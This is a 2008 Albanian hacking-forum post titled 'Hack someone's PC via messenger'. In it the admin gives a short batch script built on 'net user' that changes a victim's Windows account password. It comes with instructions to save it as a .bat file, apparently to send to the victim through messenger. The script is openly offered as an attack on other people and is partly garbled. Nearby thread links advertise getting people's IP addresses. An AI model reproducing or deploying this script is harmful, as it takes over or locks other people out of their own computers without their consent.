Would you like to react to this message? Create an account in a few clicks or log in to continue.


Valonq & CracKer-Y
 
ForumEarn moneyLatest imagesRegjistrohuidentifikimi

 

 Hacko pc e dikujna permes messengerit

Shko poshtë 
AutoriMesazh
Valonq
AdminNumri i postimeve : 152
Age : 36
Registration date : 14/10/2008

Hacko pc e dikujna permes messengerit Empty
MesazhTitulli: Hacko pc e dikujna permes messengerit   Hacko pc e dikujna permes messengerit I_icon_minitimeWed Dec 17, 2008 2:03 pm

kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani

Kodi:

1:@echo off
2:net user "psh emri i viktimes" dhe passin e ri qe doni ju *123456*
3:echo "Say Good Bay To The Bad Gay "
4:Pausemos harroni te futni passin e ri ne ato yjet ( shift 8 )
ruajeni si diqka qe ju doni por me pikë bat( .bat ) psh.. Say Good Bay To The Bad Gay.bat
ruajeni tek ALL FILES sepse ndryshe nuk funksionon

Hacko pc e dikujna permes messengerit 88014137wv8
Mbrapsht në krye Shko poshtë
https://black.albanianforum.net
 
Hacko pc e dikujna permes messengerit
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Si me dit nga eshte permes IP
» Fol permes IP- PC Telephone
» Merr email permes HI5
» Merrni IP ndonje personi permes msn
» Restartoja shokut Mobilin permes Bluetooth-it

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Tutoriale-
Kërce tek: